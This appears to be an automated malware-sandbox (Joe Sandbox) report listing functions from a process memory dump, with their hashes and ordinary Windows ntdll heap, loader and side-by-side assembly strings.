Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
API String ID: 0-761764676
Opcode ID: 74a00f979e8097f5259a24eb96bc309d92476ebc46a252e574b729121cd15538
Instruction ID: b126ff7d839b7c462566fd9f9231ae54d5744178de8077da4dad6a6e7b7eb226
Opcode Fuzzy Hash: 74a00f979e8097f5259a24eb96bc309d92476ebc46a252e574b729121cd15538
Instruction Fuzzy Hash: 67129074A00214DFEB18CF98C880AEEB7B5FF48754F5580A9E849EB354E735E842CB64

Function 3550245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

LdrpDynamicShimModule, xrefs: 3554A998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3554A992
minkernel\ntdll\ldrinit.c, xrefs: 3554A9A2
TGK5, xrefs: 35502462

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TGK5$minkernel\ntdll\ldrinit.c
API String ID: 0-2176861887
Opcode ID: 1ec1e75c9e8b31c8f12b73ede107020b70e22ec0366d4b2d0a84d3b204f806f1
Instruction ID: de644686e9d2a31da2dda735b17b6354e412c0ea396138196204ead3d0dcbfa2
Opcode Fuzzy Hash: 1ec1e75c9e8b31c8f12b73ede107020b70e22ec0366d4b2d0a84d3b204f806f1
Instruction Fuzzy Hash: 093128B6A10301ABE754DF59D845E5EB7F6FB84764F52005AFC0077251CBB07942CB90

Function 354DF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(!TrailingUCR), xrefs: 3553E3A9
HEAP: , xrefs: 3553DF64, 3553E0A8, 3553E286, 3553E39E
HEAP[%wZ]: , xrefs: 3553DF57, 3553E09B, 3553E279, 3553E391
(UCRBlock != NULL), xrefs: 3553DF6F
((LONG)FreeEntry->Size > 1), xrefs: 3553E0B3
(LONG)FreeEntry->Size > 1, xrefs: 3553E291

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 22190896430e765a37b0daee610e82f040931738ed93a7b6e4dc3a8b644469f7
Instruction ID: 4f0fa607180d076c60c9aadee0fd3d87e3da7cbce1e8463ac15354542bf6ad61
Opcode Fuzzy Hash: 22190896430e765a37b0daee610e82f040931738ed93a7b6e4dc3a8b644469f7
Instruction Fuzzy Hash: FE42D075609381AFD719CF28C8A0B6AF7E5FF84344F54496DE8898B352DB34E842CB52

Function 355051EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON

Download Yara Rule

Strings

H/P5, xrefs: 355054F0, 355054AF, 3554BC60, 355053DD, 3554BBFC, 35505304, 35505307, 355053E0, 355054B2, 355054F3, 3554BBFF, 3554BC63
Kernel-MUI-Language-SKU, xrefs: 3550542B
Kernel-MUI-Number-Allowed, xrefs: 35505247
WindowsExcludedProcs, xrefs: 3550522A
Kernel-MUI-Language-Disallowed, xrefs: 35505352
Kernel-MUI-Language-Allowed, xrefs: 3550527B

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: H/P5$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-2026567190
Opcode ID: 6eaa3ff474e3bda837e9833b5462b4cfbdc3e90b70a1cd1ba831cc3d132966d3
Instruction ID: 681d797a1f78586a1f870808c41bfb7836e9bc414e3014ad1f473d9b79004453
Opcode Fuzzy Hash: 6eaa3ff474e3bda837e9833b5462b4cfbdc3e90b70a1cd1ba831cc3d132966d3
Instruction Fuzzy Hash: 73F12DB6E10219EFDF05CFA8C980DDEBBB9FF48650F55446AE501A7250E774AE018FA0

Function 354FB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

DLL %wZ was redirected to %wZ by %s, xrefs: 355483FC
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 355484D0
SxS, xrefs: 355483ED
LdrpPreprocessDllName, xrefs: 35548403, 355484D7
minkernel\ntdll\ldrutil.c, xrefs: 3554840D, 355484E1
API set, xrefs: 355483F4, 355483F9

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: fe7caac78947499a150738c02187ba64994105315c591fc0ca8e25079bbeb83e
Instruction ID: 8c609df800a25f52ffc8c6d5e0888e5ddd44a4cbcf2f1aef4c8517f0e611c6cf
Opcode Fuzzy Hash: fe7caac78947499a150738c02187ba64994105315c591fc0ca8e25079bbeb83e
Instruction Fuzzy Hash: EDC127B1B04315ABEB1CCF68C880BBE77B5BF46314F5580A9E842AB390DBB5D945C391

Function 35512674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 35552180
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 3555219F
SXS: %s() passed the empty activation context, xrefs: 35552165
RtlGetAssemblyStorageRoot, xrefs: 35552160, 3555219A, 355521BA
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 355521BF
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 35552178

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: e486a0cf2d73fcc8b58ee04aa9913078290ed490390af559becbec9a61d2d586
Instruction ID: df786eb3edd86a38c519e4b30f4dd203650f4dc809302fd0326ef2912b52ac73
Opcode Fuzzy Hash: e486a0cf2d73fcc8b58ee04aa9913078290ed490390af559becbec9a61d2d586
Instruction Fuzzy Hash: 1231C57AE0021477FB15CA969C40F5F7B78EF95690F46449ABA05BB240D670BB01CBE1

Function 3551C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 355581E5
LdrpInitializeImportRedirection, xrefs: 35558177, 355581EB
minkernel\ntdll\ldrinit.c, xrefs: 3551C6C3
Loading import redirection DLL: '%wZ', xrefs: 35558170
minkernel\ntdll\ldrredirect.c, xrefs: 35558181, 355581F5
LdrpInitializeProcess, xrefs: 3551C6C4

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 4ffc4bfca0d6782e2f2e5e2223bfdfbb0c09ca6f0970ae14887e7170f7df5ac9
Instruction ID: fd085d60052182ce683fe743ba82fc9ee879100cf61511e6b8be5682ae9969a9
Opcode Fuzzy Hash: 4ffc4bfca0d6782e2f2e5e2223bfdfbb0c09ca6f0970ae14887e7170f7df5ac9
Instruction Fuzzy Hash: C03104B67043559FD214DF28DD45E1A77E5EFC4720F810959F881AB291EB20FD05CBA2

Function 354F0770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 355450BD
HEAP[%wZ]: , xrefs: 355450AE
(UCRBlock->Size >= *Size), xrefs: 355450CA

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: ab3ac73083b301b4f5bd3814622d6403ff9c60eea83d620bcf8d992ba8bc33eb
Instruction ID: f17b1611348475234381cb6ea81ea4b66970d162d3d13ded81330887acd96e30
Opcode Fuzzy Hash: ab3ac73083b301b4f5bd3814622d6403ff9c60eea83d620bcf8d992ba8bc33eb
Instruction Fuzzy Hash: E8F19BB4B04605DFEB19CF68C894F6AB7F6FB84304F1081A9E44A9B391DB75B941CB90

Function 3550F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 355502BD
RTL: Re-Waiting, xrefs: 3555031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 355502E7

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 91a71f3f110f14b0e00681db8d34107b09777d8778b3ce60747297ed14c59129
Instruction ID: b0962dbdc364acb31d04cb2d6cb5bbc84366a0e083d9a52a79e8628e33d58343
Opcode Fuzzy Hash: 91a71f3f110f14b0e00681db8d34107b09777d8778b3ce60747297ed14c59129
Instruction Fuzzy Hash: C0E19B756087419FE711CF28C880B1AB7E1BF84364F540A6AF5A6CB2E1DB74F945CB82

Function 3551C720 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3551C7BF

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 355582DE
minkernel\ntdll\ldrinit.c, xrefs: 355582E8
Failed to reallocate the system dirs string !, xrefs: 355582D7

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 34bdca444792f08ebd56eccf317367946c745bb76ea8871718852918a8fdaad7
Instruction ID: 875d6f62c79509723ced221ecb9d3c0f84c19a140a7459e37ec1267034e5492f
Opcode Fuzzy Hash: 34bdca444792f08ebd56eccf317367946c745bb76ea8871718852918a8fdaad7
Instruction Fuzzy Hash: 3041C276A15300EBEB14EB64DC41B4B7BF8BB84660F41492FB945E3250EBB1F901CB91

Function 35564755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 35564809

Strings

Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 35564888
LdrpCheckRedirection, xrefs: 3556488F
minkernel\ntdll\ldrredirect.c, xrefs: 35564899

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 21a009baf59c0994bf2b114e8c0ec74ec742094792e417cabf487864e3d8eec5
Instruction ID: ee4e3bea8d1f9df2d606608f51490b31a57b3930975a22538579a40b9ac260e8
Opcode Fuzzy Hash: 21a009baf59c0994bf2b114e8c0ec74ec742094792e417cabf487864e3d8eec5
Instruction Fuzzy Hash: 3541D076A043D0CBDB11CE68D980A1677E5BF8A69AF021659EC85E7311DB30F801CBD2

Function 35569C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON

Download Yara Rule

Strings

AVRF: Verifier .dlls must not have thread locals, xrefs: 3556A12D
\KnownDlls32, xrefs: 35569C67
L, xrefs: 3556A2FB
@, xrefs: 35569E80
KnownDllPath, xrefs: 35569CF9

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
API String ID: 3446177414-3127649145
Opcode ID: 2c0cf52d63f2252c2d2a62c7fce7fb3ce9e11e1bb8f57e697af6d8f02eeb9087
Instruction ID: e6bf1d2a7b8c9b97d2ce37b1c84b26753265b6cf43730e0b43ed473fc63772ef
Opcode Fuzzy Hash: 2c0cf52d63f2252c2d2a62c7fce7fb3ce9e11e1bb8f57e697af6d8f02eeb9087
Instruction Fuzzy Hash: E5323875A01759DBDB21CF65CC88B9AB7F8FF48304F5051EAE909A7250EB70AA84CF50

Function 354F9950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON

Download Yara Rule

Strings

, xrefs: 354F99F1
Status != STATUS_SXS_SECTION_NOT_FOUND, xrefs: 355476A3
minkernel\ntdll\sxsisol.cpp, xrefs: 355476AD
, xrefs: 354F99F9
Internal error check failed, xrefs: 355476B2

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
API String ID: 0-3393094623
Opcode ID: 91e34ff4e01e3451a97621616369ffd4759b74da19f22c3bcc1436f223ec58c7
Instruction ID: 1062d09091436c33b17b41036008a346494f649462ddbbc67bee1e11abcceae0
Opcode Fuzzy Hash: 91e34ff4e01e3451a97621616369ffd4759b74da19f22c3bcc1436f223ec58c7
Instruction Fuzzy Hash: A7025AB590C3818BD325CF68C084B9BB7F5BF88744F41895EE8999B350E772D845CB92

Function 35564F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON

Download Yara Rule

Strings

\, xrefs: 35564F66
.DLL, xrefs: 355650C7, 3556519C
/, xrefs: 35564F6D
\microsoft.system.package.metadata\Application, xrefs: 35565158
.Local, xrefs: 35565170

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
API String ID: 0-2518169356
Opcode ID: 25d935b786af3f93df683a6bc8c94b5069151122061ef3ffa03fb077708c82db
Instruction ID: 95c93e106aaa42c6dac697941a30ce25df816e6da9ae9e983e6ecccefdb2675f
Opcode Fuzzy Hash: 25d935b786af3f93df683a6bc8c94b5069151122061ef3ffa03fb077708c82db
Instruction Fuzzy Hash: EC91C176E0065ACBCB11CFA8C880AAEB7B1FF48318F955169E851E7350E775EA41CB90

Function 355BB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 355BB329
RtlDebugPrintTimes.NTDLL ref: 355BB605

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: af08a55fd09d3da3f6e5c1669e0f6fd56f6acafa9fc45752498e5187466aad87
Instruction ID: b5d5b21966620564b1d3468ad10cf3a124a6c3a4b7b99cb0796bcfcad1e8dcec
Opcode Fuzzy Hash: af08a55fd09d3da3f6e5c1669e0f6fd56f6acafa9fc45752498e5187466aad87
Instruction Fuzzy Hash: C7F10776E006118BDF08CFA9C99567DFBF6BF88220759416DD496DB380E6B4FA01CB50

Function 355911A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3559124A, 3559125D, 3559125F, 355912C4
This is located in the %s field of the heap header., xrefs: 355912D6
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 35591261
HEAP[%wZ]: , xrefs: 3559123D, 355912B7
-M5`, xrefs: 35591270

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$ -M5`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-1974805449
Opcode ID: 2d767caabf903787e032da95ecd8d6b9eeb08ca8bf9caa41cc79d35016368d2e
Instruction ID: a0b4ac9a17979e919dc5bf410d5b75016c59d20523f3a70d930d13fb5d5d6f43
Opcode Fuzzy Hash: 2d767caabf903787e032da95ecd8d6b9eeb08ca8bf9caa41cc79d35016368d2e
Instruction Fuzzy Hash: 0131B2352152A0EFDB0DEBD9C880F96F3F9FF04660F510499F442DB291EA78B840CAA5

Function 354D76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 3553B023
HEAP[%wZ]: , xrefs: 3553B016
RtlFreeHeap, xrefs: 3553B03F
Invalid heap signature for heap at %p, xrefs: 3553B02F
, passed to %s, xrefs: 3553B040

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 246e50aab2824fb98945a4fd8da6665bc3f2184432748adf97cd4a9189948a8e
Instruction ID: 7a7a1dec38a5b9d2ac7067d368a28b0d9862043e5f62ad3480e6d08fb03d477d
Opcode Fuzzy Hash: 246e50aab2824fb98945a4fd8da6665bc3f2184432748adf97cd4a9189948a8e
Instruction Fuzzy Hash: 0101FC361161C0DED61DD718D52AF92F7E4EB42630F1540DEF4484B652DEE4B881CD70

Function 354F70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 354F7C7C, 354F867F
HEAP[%wZ]: , xrefs: 354F7C6D, 354F8670
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 354F7C96, 354F8696

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: e2b733a4257fdce1ccb946b07f6f12a7352bb332835db6c775612a46aa9af073
Instruction ID: 1a6d30a8d9546b189b8c0ce22f6ec608ad917317269963c2aa50f6afe35d02bb
Opcode Fuzzy Hash: e2b733a4257fdce1ccb946b07f6f12a7352bb332835db6c775612a46aa9af073
Instruction Fuzzy Hash: 6313BD74A04755CFEB18CF68C990BA9BBF1FF48304F1481A9D849AB381D776A852CF90

Function 354E04E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 354E055E

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 354E063D
kLsE, xrefs: 354E0540

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 46e9563fee22d6ece4705122b7150173e3a02b76b3958308c030d19fd8969971
Instruction ID: 43c49a672f8d27728c96083ee379b5ceb661ed92c4bd301f3e6d96e3457ff996
Opcode Fuzzy Hash: 46e9563fee22d6ece4705122b7150173e3a02b76b3958308c030d19fd8969971
Instruction Fuzzy Hash: AD519AB5A047429BD328DF75C440BA7B7E5BF85301F00487EE9AE87240E770E546CBA2

Function 354F3D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 354F437C, 354F45B4, 354F4853
HEAP[%wZ]: , xrefs: 354F436D, 354F45A5, 354F4844
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 354F4393, 354F45CB, 354F486D

Memory Dump Source

